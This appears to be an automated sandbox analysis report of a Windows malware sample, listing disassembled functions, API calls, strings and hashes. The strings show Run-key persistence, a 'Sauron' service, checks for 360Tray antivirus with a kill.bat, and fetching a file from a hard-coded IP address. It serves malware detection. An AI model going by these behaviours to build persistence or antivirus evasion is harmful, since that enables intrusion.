Opcode ID: ce73427ce8f761b3dad1b7c80fef9897824e75171b7770fdc859027cd5c70915
Instruction ID: 298e1c8768a42ccc2dda948b0dde03e239ecbe2065c22611f8f7cf49ad5a805d
Opcode Fuzzy Hash: ce73427ce8f761b3dad1b7c80fef9897824e75171b7770fdc859027cd5c70915
Instruction Fuzzy Hash: EC31AB3A80111ABBDF02DFE4ED89EFF7AB9FF19250F500119FA01A2051CB359A11DB62

Function 1000C78D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 68filestringCOMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 1000C7A3
CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 1000C80A
GetFileSize.KERNEL32(?,00000000), ref: 1000C826
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 1000C845
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 1000C855
WriteFile.KERNEL32(?,00000000,00000000), ref: 1000C867
CloseHandle.KERNEL32(?), ref: 1000C874

Strings

Default, xrefs: 1000C7A9, 1000C7CD
.dat, xrefs: 1000C7DD

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$CloseCreateFolderHandlePathPointerSizeSpecialWritelstrlen
String ID: .dat$Default
API String ID: 2901490279-889281589
Opcode ID: 9d7d67d6f73e9620ed0ea70f2e09a4faaba14b3e4c6aa31f7239911900e147eb
Instruction ID: a20de023b0330f89e89bc904fc1cad761f92562ef10cbd1a87dcaf33f2d9a14c
Opcode Fuzzy Hash: 9d7d67d6f73e9620ed0ea70f2e09a4faaba14b3e4c6aa31f7239911900e147eb
Instruction Fuzzy Hash: B62142B5940218FBEB24DBA0CC4AFD97778FB58701F108598F709A6181D7B1AAC48F94

Function 10003AD6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 68filestringCOMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 10003AEC
CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 10003B53
GetFileSize.KERNEL32(?,00000000), ref: 10003B6F
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 10003B8E
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 10003B9E
WriteFile.KERNEL32(?,00000000,00000000), ref: 10003BB0
CloseHandle.KERNEL32(?), ref: 10003BBD

Strings

.dat, xrefs: 10003B26
Default, xrefs: 10003AF2, 10003B16

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$CloseCreateFolderHandlePathPointerSizeSpecialWritelstrlen
String ID: .dat$Default
API String ID: 2901490279-889281589
Opcode ID: b1cd771a1fdc5b76f1ce7476a56f83dbe9bcf4269a422c9504a11991d6ca745b
Instruction ID: 91041d9b6463b6bc15306fd0ddea4940ed7cd8e3ab9b770ce6458d3d1dfba7e9
Opcode Fuzzy Hash: b1cd771a1fdc5b76f1ce7476a56f83dbe9bcf4269a422c9504a11991d6ca745b
Instruction Fuzzy Hash: 572154B5D40218FBEB24DBA0DC4AFD97778BB18705F108589F709A6181D7B5AAC48FA0

Function 10009219 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 53sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 1000283E: RegOpenKeyExA.ADVAPI32(00000001,?,00000000,00020019,?), ref: 10002862

Sleep.KERNEL32(000493E0), ref: 10009266

Part of subcall function 10008E2E: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10008E45
Part of subcall function 10008E2E: Process32First.KERNEL32(?,00000128), ref: 10008E62

CreateThread.KERNEL32(00000000,00000000,Function_00009120,00000000,00000000,00000000), ref: 1000928C
CreateThread.KERNEL32(00000000,00000000,Function_00009120,00000000,00000000,00000000), ref: 100092B4
Sleep.KERNEL32(000493E0), ref: 100092BF

Strings

360Tray.exe, xrefs: 1000926C
C:\xxxx.inst.ini, xrefs: 1000924D
360tray.exe, xrefs: 10009294
XXX3XXX, xrefs: 10009229
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 1000922E

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Create$SleepThread$FirstOpenProcess32SnapshotToolhelp32
String ID: 360Tray.exe$360tray.exe$C:\xxxx.inst.ini$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$XXX3XXX
API String ID: 2411273043-831208851
Opcode ID: 44ab3d3feaa8152b687032eb7b37800a961eca7ec03041448f6b3be7d4c86031
Instruction ID: ece9cdc300bc39e1d7b6100d695daae1725cd2961e28e6346d07ea7cd061921c
Opcode Fuzzy Hash: 44ab3d3feaa8152b687032eb7b37800a961eca7ec03041448f6b3be7d4c86031
Instruction Fuzzy Hash: 8D011275A89712B1F560D3604C47F5E3194EB19BC5F300130FF0AB84D9E791F955855B

Function 10009096 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 41sleepprocessthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000493E0), ref: 1000909E
CreateThread.KERNEL32(00000000,00000000,Function_00002252,00000000,00000000,00000000), ref: 100090B3

Part of subcall function 10008E2E: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10008E45
Part of subcall function 10008E2E: Process32First.KERNEL32(?,00000128), ref: 10008E62

Sleep.KERNEL32(000493E0), ref: 10009116

Part of subcall function 10006601: CreateFileA.KERNEL32(1000281B,40000000,00000001,00000000,00000002,00000000,00000000,?,1000281B), ref: 1000661E
Part of subcall function 10006601: WriteFile.KERNEL32(000000FF,1002DF74,00000581,1000281B,00000000), ref: 10006645
Part of subcall function 10006601: CloseHandle.KERNEL32(000000FF), ref: 10006657

Part of subcall function 1000241C: SetFileAttributesA.KERNEL32(?,00000006,?,1000B014,C:\ProgramData\Microsoft\Program\xxxxxx.jpg,00000001), ref: 10002431

WinExec.KERNEL32(C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat,00000000), ref: 1000910B

Strings

C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat, xrefs: 100090E8
C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat, xrefs: 100090F7
360Tray.exe, xrefs: 100090C2
360tray.exe, xrefs: 100090D5
C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat, xrefs: 10009106

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: CreateFile$Sleep$AttributesCloseExecFirstHandleProcess32SnapshotThreadToolhelp32Write
String ID: 360Tray.exe$360tray.exe$C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat$C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat$C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat
API String ID: 53373693-3263839529
Opcode ID: bff3f28c47a8485d1a4d4f1570321beda6b9f314c1341bc6ef912270dcc41fb4
Instruction ID: b77ec7e2ec5511d836cb7f6ef986337103079ee989a0033a00fc7cebb4d2864f
Opcode Fuzzy Hash: bff3f28c47a8485d1a4d4f1570321beda6b9f314c1341bc6ef912270dcc41fb4
Instruction Fuzzy Hash: 9EF05E75B89252F6F610D7A19C4BF9E3644EB107C6F310031FF09A81DAEB81A959816B

Function 10025155 Relevance: 15.1, APIs: 10, Instructions: 99memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,10058280,00000100,?,?,?,100253FE,?,00000100,10025029,1002506D,1002137A,00000100,10021313,00000002,?), ref: 10025164
GlobalAlloc.KERNEL32(00002002,-00000020,00000002,?,?,?,100253FE,?,00000100,10025029,1002506D,1002137A,00000100,10021313,00000002,?), ref: 100251B9
GlobalHandle.KERNEL32(?), ref: 100251C2
GlobalUnlock.KERNEL32(00000000), ref: 100251CB
GlobalReAlloc.KERNEL32(00000000,-00000020,00002002), ref: 100251DD
GlobalHandle.KERNEL32(?), ref: 100251F4
GlobalLock.KERNEL32(00000000), ref: 100251FB
LeaveCriticalSection.KERNEL32(00000002,?,?,?,100253FE,?,00000100,10025029,1002506D,1002137A,00000100,10021313,00000002,?,00000100), ref: 10025201
GlobalLock.KERNEL32(?), ref: 10025210
LeaveCriticalSection.KERNEL32(?,?,?), ref: 10025259

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
String ID:
API String ID: 2667261700-0
Opcode ID: c7ef031a6de2a4e2382236c7cfafde6b1d6a05fad06e64d0a61f6d70f10c4f68
Instruction ID: 87b1f1fb703558cdc146120b8c5bf7cff313e9904caa879cbc609db60c4388af
Opcode Fuzzy Hash: c7ef031a6de2a4e2382236c7cfafde6b1d6a05fad06e64d0a61f6d70f10c4f68
Instruction Fuzzy Hash: 4731AF75600305AFE724DF68EC89A2AB7E9FF45202B504A2DF857C36A1E772FC158B10

Function 1000E7C8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,1000E42E), ref: 1000E7F0
GetProcAddress.KERNEL32(1000E42E,IsBadReadPtr), ref: 1000E802
LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,1000E42E), ref: 1000E856
FreeLibrary.KERNEL32(00000000), ref: 1000E995

Strings

IsBadReadPtr, xrefs: 1000E7F9
kernel32.dll, xrefs: 1000E7EB

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Library$Load$AddressFreeProc
String ID: IsBadReadPtr$kernel32.dll
API String ID: 2632591731-2271619998
Opcode ID: 715f9256b0e3b2d9b73536610a5fc59b8065de30de6ee05f70a3285ebd88eef7
Instruction ID: 14fc46c349516b3526a0f2e15c535b705d3499d9156ad19def47f618b62fe50e
Opcode Fuzzy Hash: 715f9256b0e3b2d9b73536610a5fc59b8065de30de6ee05f70a3285ebd88eef7
Instruction Fuzzy Hash: BC61C3B4E0020ADFEB44CF94C884AAEBBB1FF49354F248159E945AB355D735AD82CF90

Function 1000B44C Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75networksleepregistryCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(Mozilla/4.0 (compatible),00000000,00000000,00000000,00000000), ref: 1000B495
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000100,00000000), ref: 1000B4E0
InternetReadFile.WININET(00000000,?,00000824,00000000), ref: 1000B513
InternetCloseHandle.WININET(00000000), ref: 1000B573
InternetCloseHandle.WININET(00000000), ref: 1000B580
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1000B60D
CopyFileA.KERNEL32(00000000,?,00000000), ref: 1000B623
RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 1000B641
RegSetValueExA.ADVAPI32(?,10057E44,00000000,00000001,?,00000018), ref: 1000B664
RegCloseKey.ADVAPI32(?), ref: 1000B671
Sleep.KERNEL32(0000003C), ref: 1000B687
StartServiceCtrlDispatcherA.ADVAPI32(Sauron), ref: 1000B6D4
GetModuleFileNameA.KERNEL32(00000000,?,000000E1), ref: 1000B79F
CopyFileA.KERNEL32(?,?,00000000), ref: 1000B7B5
Sleep.KERNEL32(000001F4), ref: 1000B7DC
Sleep.KERNEL32(0000003C), ref: 1000B807
Sleep.KERNEL32(00001388), ref: 1000B814

Strings

Mozilla/4.0 (compatible), xrefs: 1000B490
http://%s/ip.txt, xrefs: 1000B4B3
47.76.31.57, xrefs: 1000B4AE, 1000B53D, 1000B555

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: FileInternet$Sleep$CloseOpen$CopyHandleModuleName$CtrlDispatcherReadServiceStartValue
String ID: 47.76.31.57$Mozilla/4.0 (compatible)$http://%s/ip.txt
API String ID: 3081250410-1279400017
Opcode ID: bbfa6cd415bf524bb8d6fcc7b9525eecb273eabb15aa459243d8bcf1bdce0dce
Instruction ID: fee8aa6f83b4f1aba13ebf8139456e989283e91a6ded5d875c83a0152e650c7c
Opcode Fuzzy Hash: bbfa6cd415bf524bb8d6fcc7b9525eecb273eabb15aa459243d8bcf1bdce0dce
Instruction Fuzzy Hash: 86313EB1D41224AAFB20DB50CC46FEDB778FB48341F1044E9E60966182DB70AE84CF54

Function 1001B098 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,100190AD,?,Microsoft Visual C++ Runtime Library,00012010,?,10027B2C,?,10027B7C,?,?,?,Runtime Error!Program: ), ref: 1001B0AA
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 1001B0C2
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 1001B0D3
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 1001B0E0

Strings

MessageBoxA, xrefs: 1001B0BC
user32.dll, xrefs: 1001B0A5
GetLastActivePopup, xrefs: 1001B0D5
GetActiveWindow, xrefs: 1001B0CD

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: 54f6860a52cfe5fdd4ff94b28f617395af62ba281ea1a95e8c4f2290b4987aee
Instruction ID: 064a5d17b31e299fe02e2cc87dc8edfdfa1e57b27b864a5c6e0c96cdbd573fb3
Opcode Fuzzy Hash: 54f6860a52cfe5fdd4ff94b28f617395af62ba281ea1a95e8c4f2290b4987aee
Instruction Fuzzy Hash: 8501D631600A21BFEBC1DFB99CD0E5A3BE8FB485D07521429FB08E6160D730E989CB20

Function 1001BD4A Relevance: 13.7, APIs: 9, Instructions: 221COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,10027834,00000001,10027834,00000001,00000000,04AB118C,10012C70,00000000,?,?,?,10017060,?,0000000C), ref: 1001BD88
CompareStringA.KERNEL32(00000000,00000000,10027830,00000001,10027830,00000001,?,?,?,10017060,?,0000000C), ref: 1001BDA5
CompareStringA.KERNEL32(?,?,00000000,?,0000000C,?,00000000,04AB118C,10012C70,00000000,?,?,?,10017060,?,0000000C), ref: 1001BE03
GetCPInfo.KERNEL32(10017060,00000000,00000000,04AB118C,10012C70,00000000,?,?,?,10017060,?,0000000C), ref: 1001BE54
MultiByteToWideChar.KERNEL32(10017060,00000009,00000000,?,00000000,00000000,?,?,?,10017060,?,0000000C), ref: 1001BED3
MultiByteToWideChar.KERNEL32(10017060,00000001,00000000,?,?,?,?,?,?,10017060,?,0000000C), ref: 1001BF34
MultiByteToWideChar.KERNEL32(10017060,00000009,0000000C,?,00000000,00000000,?,?,?,10017060,?,0000000C), ref: 1001BF47
MultiByteToWideChar.KERNEL32(10017060,00000001,0000000C,?,?,00000000,?,?,?,10017060,?,0000000C), ref: 1001BF93
CompareStringW.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,?,?,10017060,?,0000000C), ref: 1001BFAB

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: ByteCharCompareMultiStringWide$Info
String ID:
API String ID: 1651298574-0
Opcode ID: c74f0e388fb9aa31f962c4d6c2c9c29521f659c1c8047b8b9a88e59c1b26aeba
Instruction ID: ba5398d9e99919a6e421e26962e567d64c0b9127a961a297fa31ef0235025570
Opcode Fuzzy Hash: c74f0e388fb9aa31f962c4d6c2c9c29521f659c1c8047b8b9a88e59c1b26aeba
Instruction Fuzzy Hash: A7718D3290065AAFDF21CF94CD85ADE7BFAFB05290F114029FA50AA160D331CC91DF90

Function 10016A50 Relevance: 13.7, APIs: 9, Instructions: 177COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,10027834,00000001,00000000,00000000,74DEE860,1005A634,?,00000003,00000000,00000001,00000000,?,?,1001C289), ref: 10016A92
LCMapStringA.KERNEL32(00000000,00000100,10027830,00000001,00000000,00000000,?,?,1001C289,?), ref: 10016AAE
LCMapStringA.KERNEL32(?,?,00000000,00000001,00000000,00000003,74DEE860,1005A634,?,00000003,00000000,00000001,00000000,?,?,1001C289), ref: 10016AF7
MultiByteToWideChar.KERNEL32(?,1005A635,00000000,00000001,00000000,00000000,74DEE860,1005A634,?,00000003,00000000,00000001,00000000,?,?,1001C289), ref: 10016B2F
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,?,00000000), ref: 10016B87
LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 10016B9D
LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 10016BD0
LCMapStringW.KERNEL32(?,?,?,?,?,00000000), ref: 10016C38

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: 184ce37c6c7a9103535a3adb156bfcace6c95f566209ae9bef3be7a9bed0d1c8
Instruction ID: 4b583370882a413aa6a868ca46eca4a7a901ee849f2a1ca524f73d69c03606be
Opcode Fuzzy Hash: 184ce37c6c7a9103535a3adb156bfcace6c95f566209ae9bef3be7a9bed0d1c8
Instruction Fuzzy Hash: 99513832900259EBDF22CF94CD85ADE7FB5FB48794F204119F918AA160D332DDA1DBA1

Function 1000883F Relevance: 13.6, APIs: 9, Instructions: 62sleepCOMMON

Download Yara Rule

APIs

SetServiceStatus.ADVAPI32(00000000,10054DF8), ref: 10008885
Sleep.KERNEL32(000001F4), ref: 10008890
SetServiceStatus.ADVAPI32(00000000,10054DF8), ref: 100088CF
Sleep.KERNEL32(000001F4), ref: 100088DA
SetServiceStatus.ADVAPI32(00000000,10054DF8), ref: 10008919
Sleep.KERNEL32(000001F4), ref: 10008924
SetServiceStatus.ADVAPI32(00000000,10054DF8), ref: 1000895F
Sleep.KERNEL32(000001F4), ref: 1000896A
SetServiceStatus.ADVAPI32(00000000,10054DF8), ref: 10008990

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: ServiceStatus$Sleep
String ID:
API String ID: 4108286180-0
Opcode ID: 91bfc0c696c1678ae28042db0d9a33b8ba9e4a02f3ef1d67bdf351e1d091272c
Instruction ID: 6add0f0eb89e429045238f1666a6e4ef775b67a8b8ecda209cb792e8caa56abc
Opcode Fuzzy Hash: 91bfc0c696c1678ae28042db0d9a33b8ba9e4a02f3ef1d67bdf351e1d091272c
Instruction Fuzzy Hash: B331E4B0600226EBF324DF91CD9CBE97BB4F70470CF128089E617562A0CBBA565C9F61

Function 035A353C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 035A365B
___TypeMatch.LIBVCRUNTIME ref: 035A3769
_UnwindNestedFrames.LIBCMT ref: 035A38BB
CallUnexpected.LIBVCRUNTIME ref: 035A38D6

Strings

csm, xrefs: 035A3579
csm, xrefs: 035A3692
csm, xrefs: 035A35E6

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: a5a272bf8783508c5dbe5daafd8a5d4c91d7df92af2dc739f606dedb53fe941d
Instruction ID: 96c87451bb3dfd1323835ed455584b818b1bb8d9eab2819d962a695e7a609d36
Opcode Fuzzy Hash: a5a272bf8783508c5dbe5daafd8a5d4c91d7df92af2dc739f606dedb53fe941d
Instruction Fuzzy Hash: A1B19F79800A0AEFCF15DFADE88099EBBB5BF44318F184459E8016B231D731DA51EF91

Function 0360353C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0360365B
___TypeMatch.LIBVCRUNTIME ref: 03603769
_UnwindNestedFrames.LIBCMT ref: 036038BB
CallUnexpected.LIBVCRUNTIME ref: 036038D6

Strings

csm, xrefs: 03603579
csm, xrefs: 03603692
csm, xrefs: 036035E6

Memory Dump Source

Source File: 00000007.00000002.3509918905.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3600000_lXAMaI.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 7093e616745c1871d2e7dba48109e6d51986c0e864e91e4ed789ea3858f6e58f
Instruction ID: 25859e923a96cc8b46b75424db06b716c4a779ef7d8e52450a1da2c2e120e346
Opcode Fuzzy Hash: 7093e616745c1871d2e7dba48109e6d51986c0e864e91e4ed789ea3858f6e58f
